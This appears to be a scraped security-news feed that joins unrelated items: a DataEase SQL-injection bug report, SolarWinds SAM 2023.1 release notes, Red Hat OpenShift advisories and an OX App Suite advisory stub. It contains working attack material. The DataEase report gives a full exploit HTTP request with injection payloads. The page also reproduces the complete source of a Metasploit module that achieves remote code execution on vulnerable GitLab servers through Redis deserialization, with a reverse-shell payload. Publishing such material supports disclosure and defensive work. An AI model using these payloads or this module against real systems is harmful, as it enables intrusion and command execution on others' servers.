SQL Injection vulnerability in dataease before 1.2.0, allows attackers to gain sensitive information via the orders parameter to /api/sys_msg/list/1/10.

\*\*DataEase \*\*  
1.1.0-rc2

**Bug 描述**  
SQL Injection

\*\*Bug \*\*  
url:/api/sys\_msg/list/1/10

    POST /api/sys_msg/list/1/10 HTTP/1.1
    Host: demo.dataease.io
    Cookie: sysUiInfo={%22ui.logo%22:{%22paramKey%22:%22ui.logo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:1%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginLogo%22:{%22paramKey%22:%22ui.loginLogo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:2%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginImage%22:{%22paramKey%22:%22ui.loginImage%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:3%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginTitle%22:{%22paramKey%22:%22ui.loginTitle%22%2C%22paramValue%22:%22%E4%BA%BA%E4%BA%BA%E5%8F%AF%E7%94%A8%E7%9A%84%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%8F%AF%E8%A7%86%E5%8C%96%E5%88%86%E6%9E%90%E5%B7%A5%E5%85%B7%22%2C%22type%22:%22text%22%2C%22sort%22:4%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.title%22:{%22paramKey%22:%22ui.title%22%2C%22paramValue%22:%22%22%2C%22type%22:%22text%22%2C%22sort%22:5%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.favicon%22:{%22paramKey%22:%22ui.favicon%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:6%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.demo.tips%22:{%22paramKey%22:%22ui.demo.tips%22%2C%22paramValue%22:%22user:%20demo%20password:%20dataease%22%2C%22type%22:%22text%22%2C%22sort%22:100%2C%22file%22:null%2C%22fileName%22:null}}; language=zh_CN; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Length: 65
    Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
    Link-Pwd-Token: undefined
    Accept-Language: zh-CN
    Sec-Ch-Ua-Mobile: ?0
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Type: application/json;charset=UTF-8
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Origin: https://demo.dataease.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.dataease.io/?
    Accept-Encoding: gzip, deflate
    Connection: close
    
    {"orders":["(select*from(select+sleep(10)union/**/select+1)a) "]}
    

  
  
payload：extractvalue('anything',concat('~',(select database())))

CVE-2021-38239: [Bug]SQL Injection · Issue #510 · dataease/dataease

Customers who had configured their polling to occur via Kerberos did not expect NTLM Traffic on their environment, but since we were querying for data via IP address this prevented us from utilizing Kerberos.

Release date: February 15, 2023

Last updated: February 17, 2023

These release notes describe the new features, improvements, and fixed issues in Server & Application Monitor 2023.1. They also provide information about upgrades and describe workarounds for known issues.

**Learn more**

*   For information on the latest hotfixes, see SAM Hotfixes.
*   For release notes for previous SAM versions, see Previous Version documentation.
*   For information about requirements, see SAM system requirements.
*   For information about working with SAM, see the SAM Administrator Guide.

**New features and improvements**

Return to top

SAM 2023.1 offers new features and improvements compared to previous releases of SAM.

See also the SolarWinds Platform 2023.1 Release Notes.

**New customer installation**

Return to top

For information about installing Server & Application Monitor, see the SolarWinds Platform Product Installation and Upgrade Guide.

**Before you upgrade!**

Return to top

SAM 2020.2.1 can be upgraded from versions 2020.1 and later. If you are running a version earlier than SAM 2020.2.1, please upgrade to SAM 2020.2.6 first and then upgrade to SAM 2023.1.

**How to upgrade**

Return to top

Go to Settings > My Deployment to initiate the upgrade. The SolarWinds Installer upgrades your entire deployment (all SolarWinds Platform products and any scalability engines).

You must be on SAM 2020.2.1 or later to upgrade to SAM 2023.1. If you are on SAM 2020.2 or earlier, first upgrade to 2020.2.6 and then upgrade to 2023.1.

**Fixed issues**

Return to top

SAM 2023.1 fixes the following issues.

 

Case number

Description

00666976

SAM 2020.2.1 no longer automatically upgrades Orion agents to .net 4.8.

00519354, 00574585, 00625367

The Component Details Widget no longer shows the <br> tag on the resource output.

00317146

The variable for warning and critical statistic threshold is now working for the Linux component.

01000359

The temp table column no longer shows the wrong data type.

00603123

The Start/Restart services buttons now work on the Component Details Widget.

SAM 2023.1 contains all of the fixed issues from the SolarWinds Platform 2023.1 release.

See the SolarWinds Platform 2023.1 Release Notes for more information.

**CVEs**

Return to top

SolarWinds would like to thank our Security Researchers below for reporting on the issue in a responsible manner and working with our security, product, and engineering teams to fix the vulnerability.

    

CVE-ID

Vulnerability Title

Descriptions

Severity

Credit

CVE-2022-47508

Disable NTLM: SAM 2022.4

Customers who had configured their polling to occur via Kerberos did not expect NTLM Traffic on their environment, but since we were querying for data via IP address this prevented us from utilizing Kerberos.

High

 

**Known issues**

Return to top

 

Issue

Notes

Bad Request error can appear when creating new API Poller.

As a workaround:

1.  Edit the API Poller that has a Bad request error.
    
2.  Click Configure.
    
3.  Turn off the Use custom polling interval option.
    
4.  Save the API Poller.
    

OpenJDK15 included with SAM, to connect to JBoss using JConsole with either protocol, remote+http or remoting-jmx, is resulting in errors.

Different versions of JBoss use different protocol, as shown below.

*   WildFly 8, 9, and 10 and JBoss EAP 7 use protocols: service:jmx:remote+http://ip:9990 or service:jmx:remote+https://ip:9994
    
*   JBoss EAP 6 and JBoss AS 7 use protocol: service:jmx:remoting-jmx://ip:9999
    
*   JBoss EAP 5.2 and JBoss AS 6.1 use protocol: service:jmx:rmi:///jndi/rmi://ip:1090/jmxrmi
    

In order for the SAM JMX Monitor to connect, copy the jboss-cli-client.jar provided by the JBoss EAP installation to a location in SolarWinds Platform. Add the path location in jsl64.ini and then restart the JMXBridge service through Orion Service Manager.

If using JConsole to connect to a remote JBoss server for testing or troubleshooting purposes, install the latest JDK version on SolarWinds Platform server that supports jconsole.jar, and make sure JConsole uses the new JDK path.

When adding Exchange 2016 node to be monitored via WMI polling method, Exchange AppInsight is not discovered and the wizard hangs.

As a workaround, complete these steps.

In the Add node Wizard:

1.  Choose ICMP polling method.
    
2.  Finish the wizard.
    
3.  Manually assign Exchange AppInsight.
    
4.  Choose Agent polling method.
    

In Network Discovery, avoid discovering Exchange 2016 nodes via WMI. Before discovery, add them as described under Add node Wizard above.

**End of life notices**

Return to top

   

Version

EoL Announcement

EoE Effective Date

EoL Effective Date

2020.2.6

**April 18, 2023**: End-of-Life (EoL) announcement – Customers on SAM 2020.2.6 should begin transitioning to the latest version of SAM.

**May 18, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SAM 2020.2.6 will no longer be actively supported by SolarWinds.

**May 18, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SAM 2020.2.6

2020.2.5

**January 18, 2023**: End-of-Life (EoL) announcement – Customers on SAM 2020.2.5 should begin transitioning to the latest version of SAM.

**February 17, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SAM 2020.2.5 will no longer be actively supported by SolarWinds.

**February 17, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SAM 2020.2.5.

2020.2.4

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on SAM 2020.2.4 should begin transitioning to the latest version of SAM.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SAM 2020.2.4 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SAM 2020.2.4.

2020.2.1

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on SAM 2020.2.1 should begin transitioning to the latest version of SAM.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SAM 2020.2.1 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SAM 2020.2.1.

2020.2

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on SAM 2020.2 should begin transitioning to the latest version of SAM.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SAM 2020.2 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SAM 2020.2.

2019.4

**July 27, 2022**: End-of-Life (EoL) announcement - Customers on SAM version 2019.4 should begin transitioning to the latest version of SAM.

  **August 26, 2022**: End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for SAM version 2019.4 will no longer be actively supported by SolarWinds.

**August 26, 2023**: End-of-Life (EoL) - SolarWinds will no longer provide technical support for SAM version 2019.4.

6.9.1

**July 27, 2022**: End-of-Life (EoL) announcement - Customers on SAM version 6.9.1 should begin transitioning to the latest version of SAM.

  **August 26, 2022**: End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for SAM version 6.9.1 will no longer be actively supported by SolarWinds.

**August 26, 2023**: End-of-Life (EoL) - SolarWinds will no longer provide technical support for SAM version 6.9.1.

6.9

**July 27, 2022**: End-of-Life (EoL) announcement - Customers on SAM version 6.9 should begin transitioning to the latest version of SAM.

  **August 26, 2022**: End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for SAM version 6.9 will no longer be actively supported by SolarWinds.

**August 26, 2023**: End-of-Life (EoL) - SolarWinds will no longer provide technical support for SAM version 6.9.

See the End of Life Policy for information about SolarWinds product lifecycle phases. For supported versions and EoL announcements for all SolarWinds products, see Currently supported software versions.

**Legal notices**

Return to top

© 2023 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2022-47508: SAM 2023.1 Release Notes

An authenticated user can import a repository from GitHub into GitLab. If a user attempts to import a repo from an attacker-controlled server, the server will reply with a Redis serialization protocol object in the nested default_branch. GitLab will cache this object and then deserialize it when trying to load a user session, resulting in remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Git::SmartHttp  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::Remote::HTTP::Gitlab  include Msf::Exploit::RubyDeserialization  attr_accessor :cookie  def initialize(info = {})    super(      update_info(        info,        'Name' => 'GitLab GitHub Repo Import Deserialization RCE',        'Description' => %q{          An authenticated user can import a repository from GitHub into GitLab.          If a user attempts to import a repo from an attacker-controlled server,          the server will reply with a Redis serialization protocol object in the nested          `default_branch`. GitLab will cache this object and          then deserialize it when trying to load a user session, resulting in RCE.        },        'Author' => [          'William Bowling (vakzz)', # discovery          'Heyder Andrade <https://infosec.exchange/@heyder>', # msf module          'RedWay Security <https://infosec.exchange/@redway>', # PoC        ],        'References' => [          ['URL', 'https://hackerone.com/reports/1679624'],          ['URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2022-2992'], # PoC          ['URL', 'https://gitlab.com/gitlab-org/gitlab/-/issues/371884'],          ['CVE', '2022-2992']        ],        'DisclosureDate' => '2022-10-06',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),        OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),        OptInt.new('IMPORT_DELAY', [true, 'Time to wait from the import task before try to trigger the payload', 5]),        OptAddress.new('URIHOST', [false, 'Host to use in GitHub import URL'])      ]    )    deregister_options('GIT_URI')  end  def group_name    @group_name ||= Rex::Text.rand_text_alpha(8..12)  end  def api_token    @api_token ||= gitlab_create_personal_access_token  end  def session_id    @session_id ||= Rex::Text.rand_text_hex(32)  end  def redis_payload(cmd)    serialized_payload = generate_ruby_deserialization_for_command(cmd, :net_writeadapter)    gitlab_session_id = "session:gitlab:#{session_id}"    # A RESP array of 3 elements (https://redis.io/docs/reference/protocol-spec/)    # The command set    # The gitlab session to load the payload from    # The Payload itself. A Ruby serialized command    "*3\r\n$3\r\nset\r\n$#{gitlab_session_id.size}\r\n#{gitlab_session_id}\r\n$#{serialized_payload.size}\r\n#{serialized_payload}"  end  def check    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie    vprint_status('Trying to get the GitLab version')    version = Rex::Version.new(gitlab_version)    return CheckCode::Safe("Detected GitLab version #{version} which is not vulnerable") unless (      version.between?(Rex::Version.new('11.10'), Rex::Version.new('15.1.6')) ||      version.between?(Rex::Version.new('15.2'), Rex::Version.new('15.2.4')) ||      version.between?(Rex::Version.new('15.3'), Rex::Version.new('15.3.2'))    )    report_vuln(      host: rhost,      name: name,      refs: references,      info: [version]    )    return CheckCode::Appears("Detected GitLab version #{version} which is vulnerable.")  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError    return CheckCode::Detected('Could not detect the version because authentication failed.')  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e    return CheckCode::Unknown("#{e.class} - #{e.message}")  end  def cleanup    super    return unless @import_id    gitlab_delete_group(@group_id, api_token)    gitlab_revoke_personal_access_token(api_token)    gitlab_sign_out  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e    print_error("#{e.class} - #{e.message}")  end  def exploit    if Rex::Socket.is_internal?(srvhost_addr)      print_warning("#{srvhost_addr} is an internal address and will not work unless the target GitLab instance is using a non-default configuration.")    end    setup_repo_structure    start_service({      'Uri' => {        'Proc' => proc do |cli, req|          on_request_uri(cli, req)        end,        'Path' => '/'      }    })    execute_command(payload.encoded)  rescue Timeout::Error => e    fail_with(Failure::TimeoutExpired, e.message)  end  def execute_command(cmd, _opts = {})    vprint_status("Executing command: #{cmd}")    # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie    vprint_status("Session ID: #{session_id}")    vprint_status("Creating group #{group_name}")    # We need group id for the cleanup method    @group_id = gitlab_create_group(group_name, api_token)['id']    fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id    @redis_payload = redis_payload(cmd)    # import a repository from GitHub    vprint_status('Importing a repository from GitHub')    @import_id = gitlab_import_github_repo(      group_name: group_name,      github_hostname: get_uri,      api_token: api_token    )['id']    fail_with(Failure::UnexpectedReply, 'Failed to import a repository from GitHub') unless @import_id    # wait for the import tasks to finish    select(nil, nil, nil, datastore['IMPORT_DELAY'])    # execute the payload    send_request_cgi({      'uri' => normalize_uri(target_uri.path, group_name),      'method' => 'GET',      'keep_cookies' => false,      'cookie' => "_gitlab_session=#{session_id}"    })  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e    fail_with(Failure::Unknown, "#{e.class} - #{e.message}")  end  def setup_repo_structure    blob_object_fname = "#{Rex::Text.rand_text_alpha(5..10)}.txt"    blob_data = Rex::Text.rand_text_alpha(5..12)    blob_object = Msf::Exploit::Git::GitObject.build_blob_object(blob_data)    tree_data =      {        mode: '100644',        file_name: blob_object_fname,        sha1: blob_object.sha1      }    tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_data)    commit_obj = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: tree_object.sha1)    git_objs = [ commit_obj, tree_object, blob_object ]    @refs =      {        'HEAD' => 'refs/heads/main',        'refs/heads/main' => commit_obj.sha1      }    @packfile = Msf::Exploit::Git::Packfile.new('2', git_objs)  end  # Handle incoming requests from GitLab server  def on_request_uri(cli, req)    super    headers = { 'Content-Type' => 'application/json' }    data = {}.to_json    case req.uri    when %r{/api/v3/rate_limit}      headers.merge!({        'X-RateLimit-Limit' => '100000',        'X-RateLimit-Remaining' => '100000'      })    when %r{/api/v3/repositories/(\w{1,20})}      id = Regexp.last_match(1)      name = Rex::Text.rand_text_alpha(8..12)      data = {        id: id,        name: name,        full_name: "#{name}/name",        clone_url: "#{get_uri.gsub(%r{/+$}, '')}/#{name}/public.git"      }.to_json    when %r{/\w+/public.git/info/refs}      data = build_pkt_line_advertise(@refs)      headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-advertisement' })    when %r{/\w+/public.git/git-upload-pack}      data = build_pkt_line_sideband(@packfile)      headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-result' })    when %r{/api/v3/repos/\w+/\w+}      bytes_size = rand(3..8)      data = {        'default_branch' => {          'to_s' => {            'bytesize' => bytes_size,            'to_s' => "+#{Rex::Text.rand_text_alpha_lower(bytes_size)}\r\n#{@redis_payload}"            # using a simple string format for RESP          }        }      }.to_json    end    send_response(cli, data, headers)  endend

GitLab GitHub Repo Import Deserialization Remote Code Execution

Red Hat Security Advisory 2023-0651-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution esigned for on-premise or private cloud deployments.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.11.27 security update  
Advisory ID:       RHSA-2023:0651-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0651  
Issue date:        2023-02-15  
CVE Names:         CVE-2021-4238 CVE-2022-47629   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.11.27 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution esigned for on-premise or private  
cloud deployments.

Security Fix(es):

* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as  
random as they should be (CVE-2021-4238)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other elated information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Networking Day 1 - Bootstrap Doesn't Get External IP when no DHCP Server  
(BZ#2048600)

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You can download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
can be found at:

https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:65e71a774a18c1c191f28655ce245abeecd653e8215b75f87eb23ceadacd530d

(For s390x architecture)  
The image digest is  
sha256:cfccfab6abf7cd74cffbc43e4ae38745f258cb28ff6360b0f433c7718d6f144b

(For ppc64le architecture)  
The image digest is sha256:  
e13089586d2061a41250e2b546259bef0c5c4995c704d0e2220ae516a1a675da

(For aarch64 architecture)  
The image digest is  
sha256:932754cfa58f41186a48ecff03c6345c59325fc7ff1496e91e57fa34752db142

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at:  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2048600 - Networking Day 1 - Bootstrap Doesn't Get External IP when no DHCP Server  
2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-3507 - [4.11.z] Incorrect network configuration in worker node with two interfaces  
OCPBUGS-4340 - oc get dc fails when AllRequestBodies audit-profile is set in apiserver  
OCPBUGS-5459 - Topology sidebar actions doesn't show the latest resource data  
OCPBUGS-5926 - NMstate removes egressip in OpenShift cluster with SDN plugin  
OCPBUGS-6176 - Tracker: Configure ignored namespaces into multus-admission-controller (4.11)  
OCPBUGS-6683 - [4.11]Improve Pod Admission failure for restricted-v2 denials that pass with restricted   
OCPBUGS-6837 - Add rpm-build to DTK image  
OCPBUGS-6907 - Image registry Operator does not use Proxy when connecting to openstack  
OCPBUGS-6920 - Tracker: Configure ignored namespaces into multus-admission-controller (4.11,CNO)  
OCPBUGS-7033 - 4.11 error 524 from seccomp(2) when trying to load filter [rhel-8.6.0.z]   
OCPBUGS-7034 - 4.11 [iavf] It takes long time to create multiple VF interfaces and the VF interface names are not consistent [rhel-8.6.0.z]

6. References:

https://access.redhat.com/security/cve/CVE-2021-4238  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+zQA9zjgjWX9erEAQjY7Q//YWMAWAjecEvTomhKUA2d5zlkZ+5x85ce  
DRlz4l1m8INyBt6/6P7H03ahzq/3v50Zxr+SRL9trJS1V9VS9vD/n+YaIFr65gbG  
FivmQwH4tBNVjmxG4Lhn5Al87xXyJbvUHX3SRoluj1C7k8UHZBw2uhXo1bS7SHq7  
+K6e/+nXR2UroGdkDU/kB6xpMwSKE0pJrVo/xpaD9QgzGjtVXmbL3b0USEUeU3w1  
grQKknqqu7ItZaV3MgcA5DxDlOdl896Btd6/T/2RG20P2Zrf77LM5cAssiwwbDF7  
FzuU6Ve8i1oEAvHZlJjrqJyVMwF9oDjBlEdcjJKTTrpn3VeHVnEjv7l0eHcbGSsU  
kB1CpMC2UA/uQD3QDZhCpWUfybej3zuhY40lxmz5Tf/NKduX6J8uOb+0RdSYsVWr  
7Q5sp6ybngKDTLyzZJwvj/NfVuNqtkhcOXhFDeeoUjsj4ONV0PZakKj2FJfP464J  
JfLnyufhgfy03D4CbLqSeQxV9hPwW4CyQ5h46/zLtqKe06yh8LAf8fDsnkayk2h2  
I4xdIehgw1txDh8RO2d43y5i2DnSjNmacWhxWy38bNdRGxPUF36pnfjuG9T83Gw4  
iLaPQEeIVD/7692QNZO8cGntLtZoM7TkfwPAEEth3QC9JGM+TLtl2YwXQQWtxTNU  
wCGZORPJZyw=  
=sByk  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0651-01

Red Hat Security Advisory 2023-0652-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.11.27. Issues addressed include denial of service and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.11.27 security update  
Advisory ID:       RHSA-2023:0652-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0652  
Issue date:        2023-02-15  
CVE Names:         CVE-2021-38561 CVE-2022-21698 CVE-2022-47629   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.11.27 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.11.27. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:0651

Security Fix(es):

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
(CVE-2021-38561)

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter  
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-4754 - Race condition between PTP events and AMQ router startup

6. References:

https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+x7oNzjgjWX9erEAQiEOw//fWcLc4zdIR2RqMuYTi1YrzRB8VgPSewl  
hf77oNiJ5uoMAXyeMXctFWbmD7gQMjiDLmiVH7nCZjzm9VpbAsZ4SaHtWte+Qnrn  
OJlOmkRU6vrjPUxsfSA3mYjEIm5vtRgrG98SBbVKtcCCHao8cHXiJcYc8ZK39Uhr  
HvqR5CbOc+v4Vj1fx5CKtadJvLMDPbgGl/SoshaQe1OPa2PDASDU5WIUFa0dVbTS  
BJlkdEO/5K2anKedhJ3nfrsipmFb6WI9gEl5R6iS1zkPhlJpRE1tE75teIDTfE7h  
OVTZehbg/h2uHcBiPygGMNQtTTpB6U4qXuevW/AJHscaRo/1O4qHxkj0i1W41eV2  
6ArkvnICxKmKaGb9UEGnkqkCfZTANRQ1OumdUlcB/aPebcrgrWRGD2p8OMbr2cf3  
RA2y4cFCB6aPLZTM19+1sJS2yrBoodENjaNT0IjjtN+qoOgEVyhgxbPJnW4tPD58  
/BavTbnsIssQvt8oH/WKeg/1MCur0UlJI0eWue9MjekWDH5BenGCA5PW2wFYPQzo  
FcLtMRh82O4nXLB+c1eISN0w4DVaghoZLU7VUKYLFeN5ST776qoccRv9nTbcToQP  
Pc7FcKZQgkanFAbt/r0PwtGO8n9dJISaVSGKCmM/d2pAmokpNZbXROnaPjRayy0M  
L2+/D+9wqPc=  
=m9Cy  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0652-01

OX App Suite suffers from cross site scripting and server-side request forgery vulnerabilities.

Internal reference: OXUIB-1795  
Vulnerability type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30  
Discovery date: 2022-07-29  
Solution date: 2022-10-21  
Disclosure date: 2023-02-08  
CVE: CVE-2022-37306  
